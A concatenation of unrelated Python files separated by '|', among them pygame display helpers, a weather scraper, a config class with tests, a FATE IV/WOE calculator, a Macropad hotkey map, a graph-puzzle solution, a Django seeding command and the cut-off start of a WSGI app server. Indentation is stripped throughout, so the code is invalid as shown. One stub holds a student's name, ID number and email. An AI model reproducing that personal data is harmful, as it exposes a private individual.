if image is not None:
surface.blit(image, (0, 0))
def get_display_lines(text, font, width):
'''
Returns a list of strings which have been split
to fit the given window width using the supplied font
'''
space_width = font.size(' ')[0]
result = []
text_lines = text.splitlines()
for text_line in text_lines:
words = text_line.split()
x = 0
line = ''
for word in words:
word_width = font.size(word)[0]
if x + word_width > width:
# Remove the trailing space from the line
# before adding to the list of lines to return
line = line.strip()
result.append(line)
line = word + ' '
x = word_width + space_width
else:
line = line + word + ' '
x = x + word_width + space_width
if line != '':
# Got a partial line to add to the end
# Remove the trailing space from the line
# before adding to the list of lines to return
line = line.strip()
result.append(line)
return result
def display_message(text, size=200, margin=20, horiz='center', vert='center',
color=(255, 0, 0)):
'''
Displays the text as a message
Sice can be used to select the size of the
text
'''
global window_size
global surface
handle_events()
clear_display()
# Get the text version of the input
text = str(text)
font = pygame.font.Font(None, size)
available_width = window_size[0] - (margin * 2)
lines = get_display_lines(text, font, available_width)
rendered_lines = []
height = 0
for line in lines:
rendered_line = font.render(line, 1, color)
height += rendered_line.get_height()
rendered_lines.append(rendered_line)
if height > window_size[1]:
raise Exception('Text too large for window')
if vert == 'center':
y = (window_size[1] - height) / 2.0
elif vert == 'top':
y = margin
elif vert == 'bottom':
y=(window_size[1]-margin) - height
for rendered_line in rendered_lines:
width = rendered_line.get_width()
height = rendered_line.get_height()
if horiz == 'center':
x = (available_width - width) / 2.0 + margin
elif horiz == 'left':
x = margin
elif horiz == 'right':
x = self.window_size[0] - width - margin
surface.blit(rendered_line, (x, y))
y += height
pygame.display.flip()
import urllib.request
import xml.etree.ElementTree
def get_weather_temp(latitude,longitude):
'''
Uses forecast.weather.gov to get the weather
for the specified latitude and longitude
'''
url="http://forecast.weather.gov/MapClick.php?lat={0}&lon={1}&unit=0&lg=english&FcstType=dwml".format(latitude,longitude)
req=urllib.request.urlopen(url)
page=req.read()
doc=xml.etree.ElementTree.fromstring(page)
# I'm not proud of this, but by gum it works...
for child in doc:
if child.tag == 'data':
if child.attrib['type'] == 'current observations':
for item in child:
if item.tag == 'parameters':
for i in item:
if i.tag == 'temperature':
if i.attrib['type'] == 'apparent':
for t in i:
if t.tag =='value':
return int(t.text)
def get_weather_desciption(latitude,longitude):
'''
Uses forecast.weather.gov to get the weather
for the specified latitude and longitude
'''
url="http://forecast.weather.gov/MapClick.php?lat={0}&lon={1}&unit=0&lg=english&FcstType=dwml".format(latitude,longitude)
req=urllib.request.urlopen(url)
page=req.read()
doc=xml.etree.ElementTree.fromstring(page)
# I'm not proud of this, but by gum it works...
for child in doc:
if child.tag == 'data':
if child.attrib['type'] == 'current observations':
for item in child:
if item.tag == 'parameters':
for i in item:
if i.tag == 'weather':
for t in i:
if t.tag == 'weather-conditions':
if t.get('weather-summary') is not None:
return t.get('weather-summary')
|
#~ # coding: utf-8
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import with_statement
import os
import sys
import logging
from six.moves import configparser
import threading
import codecs
logger = logging.getLogger('Config')
class Config:
def __init__(self, workingpath, name):
self.name = name
self.wp = workingpath
self.datapath = None
self.cfg = configparser.RawConfigParser()
self.cfg.save = self.save
self.lock = threading.Lock()
self.mode = self.install_check()
if self.mode:
self.load(self.mode)
def install_check(self):
returnv = None
datapath, inipath = self.pathes_get('portable')
logger.debug('Check for File: %s'%inipath)
if os.path.isfile(inipath):
returnv = 'portable'
inipath = self.pathes_get('local')[1]
logger.debug('Check for File: %s'%inipath)
if os.path.isfile(inipath):
returnv = 'local'
logger.info('Install Check returns: %s'%returnv)
self.mode = returnv
return returnv
def load(self,mode):
inipath = self.pathes_get(mode)[1]
self.lock.acquire()
self.cfg.read(inipath)
self.lock.release()
def save(self,mode=None):
self.lock.acquire()
if not mode:
mode = self.mode
folderpath,inipath = self.pathes_get(mode)
logger.info('Create Folder: %s'%folderpath)
if not os.path.isdir(folderpath):
os.makedirs(folderpath)
with codecs.open(inipath,'wb', "utf8") as inifile:
self.cfg.write(inifile)
if not self.mode:
self.install_check()
self.lock.release()
def reset(self):
self.cfg = configparser.RawConfigParser()
import shutil
pathes = []
pathes.append(self.pathes_get('portable')[0])
pathes.append(self.pathes_get('local')[0])
for path in pathes:
logger.info('Cleaning up %s'%path)
shutil.rmtree(path,True)
def pathes_get(self, mode):
logger.info('Get Pathes %s'%mode)
if mode == 'portable':
folderpath = os.path.join(self.wp,'data')
filepath = os.path.join(folderpath,'%s.ini'%self.name)
return (folderpath,filepath)
elif mode == 'local':
folderpath = os.path.expanduser('~/.config/%s'%self.name)
filepath = os.path.join(folderpath,'%s.ini'%self.name)
return (folderpath,filepath)
else:
return None
def set(self,section,option,value):
if not self.cfg.has_section(section):
self.cfg.add_section(section)
self.cfg.set(section,option,value)
def get(self,section,option):
if not self.mode:
return None
if not self.cfg.has_section(section):
return None
if not self.cfg.has_option(section,option):
return None
return self.cfg.get(section,option)
def cfg_create(self,lang):
try:
self.cfg.add_section(self.name)
except:
pass
self.cfg.set(self.name, 'language', lang)
import unittest
class TestFS(unittest.TestCase):
@classmethod
def setUpClass(cls):
import logging
logging.basicConfig(format="[%(levelname)-7s] (%(name)s) %(asctime)s.%(msecs)-3d Thread:%(thread)s/%(module)s[%(lineno)-3d]/%(funcName)-10s %(message)-8s ", level=logging.DEBUG)
workingpath = os.path.dirname(os.path.realpath(__file__))
cls._cfg = Config(workingpath,'test')
cls._cfg.reset()
@classmethod
def tearDownClass(cls):
cls._cfg.reset()
def test_1_save_portable(cls):
cls._cfg.save('portable')
assert cls._cfg.install_check() == 'local'
#~ def test_2_reset(cls):
#~ cls._cfg.reset()
#~ assert cls._cfg.install_check() == None
#~ def test_3_save_portable(cls):
#~ cls._cfg.save('local')
#~ assert cls._cfg.install_check() == 'local'
#~ def test_4_reset(cls):
#~ cls._cfg.reset()
#~ assert cls._cfg.install_check() == None
def test_5_add_get(cls):
cls._cfg.set('test','nr','1')
assert cls._cfg.get('test','nr') == '1'
cls._cfg.set('test','nr',u'1')
assert cls._cfg.get('test','nr') == '1'
cls._cfg.save('portable')
def test_6_restart_get(cls):
workingpath = os.path.dirname(os.path.realpath(__file__))
cls._cfg = Config(workingpath,'test')
assert cls._cfg.get('test','nr') == '1'
if __name__ == '__main__':
unittest.main()
#~ print u'e' + b'\u0301'
|
"""
Copyright 2017 Arm Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import os
from .config_guess_issue import ConfigGuessIssue
from .config_guess_remark import ConfigGuessRemark
from .scanner import Scanner
class ConfigGuessScanner(Scanner):
"""Scanner that scans config.guess files for aarch64 support."""
def accepts_file(self, filename):
return os.path.basename(filename) == 'config.guess'
def scan_file_object(self, filename, file, report):
for line in file:
if 'aarch64:Linux' in line:
report.add_remark(ConfigGuessRemark(filename=filename))
break
else:
report.add_issue(ConfigGuessIssue(filename=filename))
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import math
import operator
import numpy as np
from federatedml.feature.binning.base_binning import BaseBinning
from federatedml.feature.binning.bin_result import BinColResults, MultiClassBinResult
from federatedml.statistic import data_overview
from federatedml.feature.sparse_vector import SparseVector
from federatedml.cipher_compressor.compressor import PackingCipherTensor
from federatedml.util import LOGGER
class IvCalculator(object):
def __init__(self, adjustment_factor, role, party_id):
self.adjustment_factor = adjustment_factor
self.role = role
self.party_id = party_id
def cal_local_iv(self, data_instances, split_points,
labels=None, label_counts=None, bin_cols_map=None,
label_table=None):
"""
data_bin_table : Table.
Each element represent for the corresponding bin number this feature belongs to.
e.g. it could be:
[{'x1': 1, 'x2': 5, 'x3': 2}
...
]
Returns:
MultiClassBinResult object
"""
header = data_instances.schema.get("header")
if bin_cols_map is None:
bin_cols_map = {name: idx for idx, name in enumerate(header)}
bin_indexes = [idx for idx, _ in enumerate(header)]
else:
bin_indexes = []
for h in header:
if h in bin_cols_map:
bin_indexes.append(bin_cols_map[h])
if label_counts is None:
label_counts = data_overview.get_label_count(data_instances)
labels = list(label_counts.keys())
label_counts = [label_counts[k] for k in labels]
data_bin_table = BaseBinning.get_data_bin(data_instances, split_points, bin_cols_map)
sparse_bin_points = BaseBinning.get_sparse_bin(bin_indexes, split_points, header)
sparse_bin_points = {header[k]: v for k, v in sparse_bin_points.items()}
if label_table is None:
label_table = self.convert_label(data_instances, labels)
result_counts = self.cal_bin_label(data_bin_table, sparse_bin_points, label_table, label_counts)
multi_bin_res = self.cal_iv_from_counts(result_counts, labels,
role=self.role,
party_id=self.party_id)
for col_name, sp in split_points.items():
multi_bin_res.put_col_split_points(col_name, sp)
return multi_bin_res
def cal_iv_from_counts(self, result_counts, labels, role, party_id):
result = MultiClassBinResult(labels)
result.set_role_party(role, party_id)
if len(labels) == 2:
col_result_obj_dict = self.cal_single_label_iv_woe(result_counts,
self.adjustment_factor)
for col_name, bin_col_result in col_result_obj_dict.items():
result.put_col_results(col_name=col_name, col_results=bin_col_result)
else:
for label_idx, y in enumerate(labels):
this_result_counts = self.mask_label(result_counts, label_idx)
col_result_obj_dict = self.cal_single_label_iv_woe(this_result_counts,
self.adjustment_factor)
for col_name, bin_col_result in col_result_obj_dict.items():
result.put_col_results(col_name=col_name, col_results=bin_col_result, label_idx=label_idx)
return result
@staticmethod
def mask_label(result_counts, label_idx):
def _mask(counts):
res = []
for c in counts:
res.append(np.array([c[label_idx], np.sum(c) - c[label_idx]]))
return res
return result_counts.mapValues(_mask)
def cal_bin_label(self, data_bin_table, sparse_bin_points, label_table, label_counts):
"""
data_bin_table : Table.
Each element represent for the corresponding bin number this feature belongs to.
e.g. it could be:
[{'x1': 1, 'x2': 5, 'x3': 2}
...
]
sparse_bin_points: dict
Dict of sparse bin num
{"x0": 2, "x1": 3, "x2": 5 ... }
label_table : Table
id with labels
Returns:
Table with value:
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
"""
data_bin_with_label = data_bin_table.join(label_table, lambda x, y: (x, y))
f = functools.partial(self.add_label_in_partition,
sparse_bin_points=sparse_bin_points)
result_counts = data_bin_with_label.mapReducePartitions(f, self.aggregate_partition_label)
return result_counts
def cal_single_label_iv_woe(self, result_counts, adjustment_factor):
"""
Given event count information calculate iv information
Parameters
----------
result_counts: dict or table.
It is like:
{'x1': [[event_count, non_event_count], [event_count, non_event_count] ... ],
'x2': [[event_count, non_event_count], [event_count, non_event_count] ... ],
...
}
adjustment_factor : float
The adjustment factor when calculating WOE
Returns
-------
Dict of IVAttributes object
{'x1': attr_obj,
'x2': attr_obj
...
}
"""
if isinstance(result_counts, dict):
col_result_obj_dict = {}
for col_name, data_event_count in result_counts.items():
col_result_obj = self.woe_1d(data_event_count, adjustment_factor)
col_result_obj_dict[col_name] = col_result_obj
else:
woe_1d = functools.partial(self.woe_1d, adjustment_factor=adjustment_factor)
col_result_obj_dict = dict(result_counts.mapValues(woe_1d).collect())
return col_result_obj_dict
@staticmethod
def fill_sparse_result(col_name, static_nums, sparse_bin_points, label_counts):
"""
Parameters
----------
col_name: str
current col_name, use to obtain sparse point
static_nums : list.
It is like:
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
where the bin of sparse point located in is empty.
sparse_bin_points : dict
Dict of sparse bin num
{"x1": 2, "x2": 3, "x3": 5 ... }
label_counts: np.array
eg. [100, 200, ...]
Returns
-------
The format is same as static_nums.
"""
curt_all = functools.reduce(lambda x, y: x + y, static_nums)
sparse_bin = sparse_bin_points.get(col_name)
static_nums[sparse_bin] = label_counts - curt_all
return col_name, static_nums
@staticmethod
def combine_labels(result_counts, idx):
"""
result_counts: Table
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
idx: int
Returns:
"""
@staticmethod
def add_label_in_partition(data_bin_with_table, sparse_bin_points):
"""
Add all label, so that become convenient to calculate woe and iv
Parameters
----------
data_bin_with_table : Table
The input data, the Table is like:
(id, {'x1': 1, 'x2': 5, 'x3': 2}, y)
where y = [is_label_0, is_label_1, ...] which is one-hot format array of label
sparse_bin_points: dict
Dict of sparse bin num
{0: 2, 1: 3, 2:5 ... }
Returns
-------
['x1', [[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ],
'x2', [[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ],
...
]
"""
result_sum = {}
for _, datas in data_bin_with_table:
bin_idx_dict = datas[0]
y = datas[1]
for col_name, bin_idx in bin_idx_dict.items():
result_sum.setdefault(col_name, [])
col_sum = result_sum[col_name]
while bin_idx >= len(col_sum):
if isinstance(y, PackingCipherTensor):
zero_y = np.zeros(y.dim)
col_sum.append(PackingCipherTensor(zero_y.tolist()))
else:
col_sum.append(np.zeros(len(y)))
# if bin_idx == sparse_bin_points[col_name]:
# continue
col_sum[bin_idx] = col_sum[bin_idx] + y
return list(result_sum.items())
@staticmethod
def aggregate_partition_label(sum1, sum2):
"""
Used in reduce function. Aggregate the result calculate from each partition.
Parameters
----------
sum1 : list.
It is like:
[[label_0_sum, label_1_sum, ...], [label_0_sum, label_1_sum, ...] ... ]
sum2 : list
Same as sum1
Returns
-------
Merged sum. The format is same as sum1.
"""
if sum1 is None and sum2 is None:
return None
if sum1 is None:
return sum2
if sum2 is None:
return sum1
for idx, label_sum2 in enumerate(sum2):
if idx >= len(sum1):
sum1.append(label_sum2)
else:
sum1[idx] = sum1[idx] + label_sum2
return sum1
@staticmethod
def woe_1d(data_event_count, adjustment_factor):
"""
Given event and non-event count in one column, calculate its woe value.
Parameters
----------
data_event_count : list
[(event_sum, non-event_sum), (same sum in second_bin), (in third bin) ...]
adjustment_factor : float
The adjustment factor when calculating WOE
Returns
-------
IVAttributes : object
Stored information that related iv and woe value
"""
event_total = 0
non_event_total = 0
for bin_res in data_event_count:
if len(bin_res) != 2:
raise ValueError(f"bin_res should has length of 2,"
f" data_event_count: {data_event_count}, bin_res: {bin_res}")
event_total += bin_res[0]
non_event_total += bin_res[1]
if event_total == 0:
# raise ValueError("NO event label in target data")
event_total = 1
if non_event_total == 0:
# raise ValueError("NO non-event label in target data")
non_event_total = 1
iv = 0
event_count_array = []
non_event_count_array = []
event_rate_array = []
non_event_rate_array = []
woe_array = []
iv_array = []
for event_count, non_event_count in data_event_count:
if event_count == 0 or non_event_count == 0:
event_rate = 1.0 * (event_count + adjustment_factor) / event_total
non_event_rate = 1.0 * (non_event_count + adjustment_factor) / non_event_total
else:
event_rate = 1.0 * event_count / event_total
non_event_rate = 1.0 * non_event_count / non_event_total
woe_i = math.log(event_rate / non_event_rate)
event_count_array.append(int(event_count))
non_event_count_array.append(int(non_event_count))
event_rate_array.append(event_rate)
non_event_rate_array.append(non_event_rate)
woe_array.append(woe_i)
iv_i = (event_rate - non_event_rate) * woe_i
iv_array.append(iv_i)
iv += iv_i
return BinColResults(woe_array=woe_array, iv_array=iv_array, event_count_array=event_count_array,
non_event_count_array=non_event_count_array,
event_rate_array=event_rate_array, non_event_rate_array=non_event_rate_array, iv=iv)
@staticmethod
def statistic_label(data_instances):
label_counts = data_overview.get_label_count(data_instances)
label_elements = list(label_counts.keys())
label_counts = [label_counts[k] for k in label_elements]
return label_elements, label_counts
@staticmethod
def convert_label(data_instances, label_elements):
def _convert(instance):
res_labels = np.zeros(len(label_elements))
res_labels[label_elements.index(instance.label)] = 1
return res_labels
label_table = data_instances.mapValues(_convert)
return label_table
@staticmethod
def woe_transformer(data_instances, bin_inner_param, multi_class_bin_res: MultiClassBinResult,
abnormal_list=None):
if abnormal_list is None:
abnormal_list = []
bin_res = multi_class_bin_res.bin_results[0]
transform_cols_idx = bin_inner_param.transform_bin_indexes
split_points_dict = bin_res.all_split_points
is_sparse = data_overview.is_sparse_data(data_instances)
def convert(instances):
if is_sparse:
all_data = instances.features.get_all_data()
indice = []
sparse_value = []
data_shape = instances.features.get_shape()
for col_idx, col_value in all_data:
if col_idx in transform_cols_idx:
if col_value in abnormal_list:
indice.append(col_idx)
sparse_value.append(col_value)
continue
# Maybe it is because missing value add in sparse value, but
col_name = bin_inner_param.header[col_idx]
split_points = split_points_dict[col_name]
bin_num = BaseBinning.get_bin_num(col_value, split_points)
indice.append(col_idx)
col_results = bin_res.all_cols_results.get(col_name)
woe_value = col_results.woe_array[bin_num]
sparse_value.append(woe_value)
else:
indice.append(col_idx)
sparse_value.append(col_value)
sparse_vector = SparseVector(indice, sparse_value, data_shape)
instances.features = sparse_vector
else:
features = instances.features
assert isinstance(features, np.ndarray)
transform_cols_idx_set = set(transform_cols_idx)
for col_idx, col_value in enumerate(features):
if col_idx in transform_cols_idx_set:
if col_value in abnormal_list:
features[col_idx] = col_value
continue
col_name = bin_inner_param.header[col_idx]
split_points = split_points_dict[col_name]
bin_num = BaseBinning.get_bin_num(col_value, split_points)
col_results = bin_res.all_cols_results.get(col_name)
woe_value = col_results.woe_array[bin_num]
features[col_idx] = woe_value
instances.features = features
return instances
return data_instances.mapValues(convert)
@staticmethod
def check_containing_missing_value(data_instances):
is_sparse = data_overview.is_sparse_data(data_instances)
def _sparse_check(instance):
result = set()
sparse_data = instance.features.get_all_data()
for col_idx, col_value in sparse_data:
if np.isnan(col_value):
result.add(col_idx)
return result
if is_sparse:
has_missing_value = data_instances.mapValues(_sparse_check).reduce(
lambda a, b: a.union(b)
)
else:
has_missing_value = data_instances.mapValues(lambda x: x.features).reduce(operator.add)
has_missing_value = {idx for idx, value in enumerate(has_missing_value) if np.isnan(value)}
return has_missing_value
|
# MACROPAD Hotkeys: Universal Numpad
from adafruit_hid.keycode import Keycode
from adafruit_hid.consumer_control_code import ConsumerControlCode
app = {
'name' : 'Audacity',
'order': 4, # Application order on the keyboard
'macros' : [
# COLOR LABEL KEY SEQUENCE
# 1st row ----------
(0x0000ff, 'Record ', 'R'),
(0x0000ff, 'Up ', [Keycode.UP_ARROW]),
(0xff0000, 'NEW ', [Keycode.SHIFT, Keycode.R]),
# 2nd row ----------
(0x0000ff, 'START ', [Keycode.HOME]),
(0x0000ff, 'Down ', [Keycode.DOWN_ARROW]),
(0x0000ff, 'END', [Keycode.END]),
# 3rd row ----------
(0xeeeeee, 'SIL ', [Keycode.COMMAND, Keycode.L]),
(0x00ff00, 'Play ', [Keycode.SPACEBAR]),
(0xeeeeee, 'Cut ', [Keycode.COMMAND, Keycode.X]),
# 4th row ----------
(0x00ff00, 'HOME', [Keycode.HOME]),
(0x00ff00, 'PG DWN ', [Keycode.PAGE_DOWN]),
(0x00ff00, 'END ', [Keycode.END]),
]
} |
"""
============================
Grid Search Example
============================
An example of how to use Metaheuristics and GridSearch
"""
from feature_selection import HarmonicSearch
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
dataset = load_breast_cancer()
X, y = dataset['data'], dataset['target_names'].take(dataset['target'])
sc_X = StandardScaler()
X = sc_X.fit_transform(X)
# Classifier to be used in the metaheuristic
clf = SVC()
clf = RandomForestClassifier()
clf.fit(X,y)
clf.predict(X) == y
# Parameter Grid
param_grid= {
"HMCR":[0, 0.5, 0.95],
"indpb":[0.05, 0.5, 1],
"pitch":[0.05, 0.5, 1],
"repeat":[3]
}
hs = HarmonicSearch(estimator=clf, make_logbook=True)
grid_search = GridSearchCV(hs, param_grid=param_grid, scoring=hs.score_func_to_gridsearch, cv=4,
verbose=2)
grid_search.fit(X,y)
grid_search.best_params_
results = pd.DataFrame.from_dict(grid_search.cv_results_)
|
"""
This problem was asked by Google.
In a directed graph, each node is assigned an uppercase letter. We define a path's value as the number of most frequently-occurring letter along that path. For example, if a path in the graph goes through "ABACA", the value of the path is 3, since there are 3 occurrences of 'A' on the path.
Given a graph with n nodes and m directed edges, return the largest value path of the graph. If the largest value is infinite, then return null.
The graph is represented with a string and an edge list. The i-th character represents the uppercase letter of the i-th node. Each tuple in the edge list (i, j) means there is a directed edge from the i-th node to the j-th node. Self-edges are possible, as well as multi-edges.
For example, the following input graph:
ABACA
[(0, 1),
(0, 2),
(2, 3),
(3, 4)]
Would have maximum value 3 using the path of vertices [0, 2, 3, 4], (A, A, C, A).
The following input graph:
A
[(0, 0)]
Should return null, since we have an infinite loop.
"""
class GraphPath:
def __init__(self, nodes=set(), letter_counts=dict()):
self.nodes = nodes
self.letter_counts = letter_counts
def __repr__(self):
return "nodes={}, letters={}".format(self.nodes, self.letter_counts)
def get_max_value_string(graph_path, node, adjacency_map):
if node in graph_path.nodes:
return [graph_path]
new_nodes = graph_path.nodes.copy()
new_nodes.add(node)
new_letter_counts = graph_path.letter_counts.copy()
if node[0] not in new_letter_counts:
new_letter_counts[node[0]] = 0
new_letter_counts[node[0]] += 1
new_graph_path = GraphPath(new_nodes, new_letter_counts)
if node not in adjacency_map:
return [new_graph_path]
paths = list()
for child_node in adjacency_map[node]:
new_paths = get_max_value_string(
new_graph_path, child_node, adjacency_map)
paths.extend(new_paths)
return paths
def get_max_value_string_helper(graph_string, edge_list):
letter_counts = dict()
nodes = list()
for char in graph_string:
if char not in letter_counts:
letter_counts[char] = 0
else:
letter_counts[char] += 1
nodes.append("{}{}".format(char, letter_counts[char]))
# print(letter_counts)
print(nodes)
adjacency_map = dict()
for start, end in edge_list:
if nodes[start] not in adjacency_map:
adjacency_map[nodes[start]] = set()
if nodes[start] != nodes[end]:
adjacency_map[nodes[start]].add(nodes[end])
print(adjacency_map)
paths = list()
graph_path = GraphPath()
for node in adjacency_map:
new_paths = get_max_value_string(graph_path, node, adjacency_map)
paths.extend(new_paths)
max_value = 0
for path in paths:
max_path_value = max(path.letter_counts.values())
if max_path_value > max_value:
max_value = max_path_value
print(max_value)
return max_value if max_value > 0 else None
assert get_max_value_string_helper("ABACA", [(0, 1), (0, 2), (2, 3), (3, 4)]) == 3
assert not get_max_value_string_helper("A", [(0, 0)])
|
# Preencha as informações pessoais nas variáveis abaixo
name = "Gabriel Batista Albino Silva"
school_id = "16/0028361"
email = "160028361@aluno.unb.br"
|
import random
from django.core.management.base import BaseCommand
from imagefactory import create_image
from gamestore.tests.create_content import create_user, \
create_game, create_score, create_game_sale, create_category, GAME_TITLES, \
CATEGORY_TITLES
def create_users(amount):
for _ in range(amount):
yield create_user()
def create_games(amount, users, categories):
image_game = create_image(name='image', width=256, height=256)
image_icon = create_image(name='icon', width=48, height=48)
# TODO: Better titles
if users and categories:
for _ in range(amount):
yield create_game(
user=random.choice(users),
category=random.choice(categories),
title=random.choice(GAME_TITLES),
icon=image_icon,
image=image_game
)
def populate(user_amount, game_amount, sales_amount, scores_amount):
categories = tuple(map(create_category, CATEGORY_TITLES))
users = tuple(create_users(user_amount))
games = tuple(create_games(game_amount, users, categories))
sales = []
sales_dict = {}
if users and games:
for i in range(sales_amount):
user = random.choice(users)
game = random.choice(games)
bought = sales_dict.get(user, [])
if not bought:
create_game_sale(user, game)
sales.append((user, game))
sales_dict[user] = [game]
elif game not in bought:
create_game_sale(user, game)
sales.append((user, game))
sales_dict[user] = [game]
if sales:
for i in range(scores_amount):
create_score(*random.choice(sales))
class Command(BaseCommand):
"""
Manage.py command for populating database with models for testing. Usage
Populates the database with data for testing. Uses *faker* for data
generation.
.. code-block::
python manage.py populate_db
Resources:
.. [1] http://eli.thegreenplace.net/2014/02/15/programmatically-populating-a-django-database
"""
help = 'Populates database with data for testing the website.'
def add_arguments(self, parser):
parser.add_argument(
'--users',
dest='user_amount',
default=10,
type=int,
help='Amount of users to create.'
)
parser.add_argument(
'--games',
dest='game_amount',
default=2,
type=int,
help='Amount of games to create.'
)
parser.add_argument(
'--sales',
dest='sales_amount',
default=10,
type=int,
help='Amount of sales to create.'
)
parser.add_argument(
'--scores',
dest='scores_amount',
default=20,
type=int,
help='Amount of scores to create.'
)
def handle(self, *args, **options):
populate(
options['user_amount'],
options['game_amount'],
options['sales_amount'],
options['scores_amount'],
)
|
#!/pyenv/2.6/bin
import imp
import cProfile
import os
import config
from wsgi import webapp, locale
from util import instance_id_from_config
serverConfPath = config.path
webapp.configPath = serverConfPath
vodkaPath = os.path.abspath(os.path.join(os.path.dirname(__file__)))
import weakref
from pprint import pformat
from Cookie import SimpleCookie
import new
import md5
import signal
import base64
import ConfigParser
import urllib
import re
import twentyc.database
import twentyc.vodka.tools.module_manager
import tmplbridge
import session
import task as vodkatask
import traceback
import random
import logging, logging.handlers
import time
import smtplib
import errno
import socket
import operator
from constants import *
import sys
import types
import simplejson as jsonlib
import threading
import copy
from threading import Thread
from twentyc.tools.syslogfix import UTFFixedSysLogHandler
import random
import inspect
import validator
from wsgi.server import *
try:
import xbahn
except ImportError:
print "Warning, xbahn module not installed, no xbahn support"
xbahn = None
import subprocess
import bartender
import twentyc.database.tools
if xbahn:
# set up xbahn topic config
xbahn.topic_instructions["^__U\..+\.notify$"] = {
"discard_data" : True
}
# remove unretrieved task results after n seconds
TASK_CLEANUP_MARGIN = 60
# remove unfinished task after n seconds
TASK_TIMEOUT_MARGIN = 600
# remove unfinished task if it has stopped sending for n seconds
TASK_SILENCE_MARGIN = 60
# mac concurrent tasks per session
TASK_SESSION_CAP = 3
# import this to make this file runable with twistd
#from wsgi.uwsgi_server import *
##############################################################################
# Functions
###############################################################################
# Turn list of objects into a key => value dict
#def map(d, keyName='id', valueName='name', setNone=False):
# r = {}
# for k,v in d.items():
# r.setdefault(getattr(v, keyName), getattr(v, valueName))
# if setNone == True:
# r.setdefault('0', 'None')
# return r
def dbg(msg):
print "Vodka: %s" % msg
def dict_equal(a, b):
for k,v in b.items():
if a.get(k) != v:
return False
return True
def obj_equal(a, b):
if not a and b:
return False
elif not b and a:
return False
return dict_equal(a.__dict__, b.__dict__)
#############################################################################
# check if app environment is production
def is_production():
env = serverConf.get("environment", "production")
if env == "production":
return True
else:
return False
def row2dict(row):
d = {}
for columnName in row.keys():
d[columnName] = getattr(row, columnName)
if hasattr(d[columnName], "strftime"):
d[columnName] = int(d[columnName].strftime("%s"))
return d
################################################################################
# load error page
errorPage = None
################################################################################
# error handler function
def error_handler(code, message, traceback, env, config):
"""
error handler function that will take care of displaying
http error pages (404, 500 etc.)
if server env is set to production error pages will now show
a traceback
"""
try:
raise
except webapp.UploadSizeException:
ses = env.get("request").get("session").data.get("client_session")
ses.error("Uploaded file too big", True)
except:
pass
if code in [404]:
message += ": %s" % env.get("PATH_INFO", "")
if code not in [401]:
webapp.log.debug("(%d) %s\n%s" % (code, message, traceback))
if is_production():
traceback = ''
if code in [503]:
f = open("htdocs/503/index.html", "r");
html = f.read()
f.close()
return html % {
"errormsg" : serverConf.get("503_error_msg", "Out of Service"),
"errormsg_apology" : serverConf.get("503_error_apology", "We apologize for any inconvenience. Please check back soon!")
}
else:
global errorPage
if not errorPage:
f = open('htdocs/error.html', 'r')
errorPage = f.read()
f.close()
return errorPage % {
"status" : str(code), "message" : message, "traceback": traceback
}
webapp.error_handler = error_handler
###############################################################################
def format_path(path, request):
"""
format a path to handle correct brand selection
"""
ses = request["session"].data.get("client_session")
if ses:
brand = ses.brand
#print "Using brand %s" % (str(brand))
path = path.replace("__BRAND__", brand.get("dir"))
return path
webapp.format_path = format_path
# defines the order in which modules should be loaded on the client
module_js_load_order =[]
# defines the order in which modules should be loaded on the server
module_py_load_order = []
# holds the python components loaded from vodka modules (as python modules)
# indexed by modulname and component name
module_py_components = {}
from rpc import *
from datetime import datetime, timedelta
###############################################################################
# load pref validators from disk
validators_path = os.path.join(os.path.dirname(inspect.getfile(twentyc.vodka)), "data", "validators")
if os.path.exists(validators_path):
for validator_file in os.listdir(validators_path):
if re.match("^.+\.json$", validator_file):
validator.add_from_file(os.path.join(validators_path,validator_file))
###############################################################################
# Classes
###############################################################################
class VodkaAppThread(Thread):
"""
Extends threading.Thread
Example:
t = VodkaAppThread(my_func)
t.start("some text")
will call my_func("some text") in it's own thread
"""
def __init__(self, callback):
"""
Init and set callback function, the callback function
will be executed on run()
"""
Thread.__init__(self)
self.callback = callback
def run(self):
self.callback(*self.runArgs)
del self.callback
del self.runArgs
def start(self, *args):
"""
Set the arguments for the callback function and start the
thread
"""
self.runArgs = args
Thread.start(self)
###############################################################################
# VodkaApp
###############################################################################
class VodkaApp(webapp.BaseApp):
"""
The main vodka application
Also handles page rendering
"""
#############################################################################
# Initialize object
def __init__(self, clientClass=None):
"""
Initialize the App
clientClass can be set if you want client pool to spawn an object
different to VodkaClient
"""
self.config = config = webapp.dict_conf(serverConfPath)
self.mcfg = self.config.get("modules")
self._Client = clientClass or VodkaClient
self.is_production = is_production()
self.session_map = {}
self.templates = {}
self.id = instance_id_from_config(self.config.get("server",{}))
#self.id = self.config.get("server",{}).get("vodka_id",
# str(md5.new("%s-%s" % (socket.gethostname(), uwsgi.opt.get("socket"))).hexdigest())[:8]
#)
if self.config.get("profiler",{}).get("wsgi") == "yes":
self.toggle_profile_requests(state="on")
# status
self.http_requests = 0
self.http_requests_prev = 0
self.http_requests_total = 0
self.http_request_time = 0
self.app_status = 0
# load app config
self.serverConfig = serverConf
self.pathRoot = self.config.get("server",{}).get("root", "/")
self.locationConfig = self.config.get("locations", {
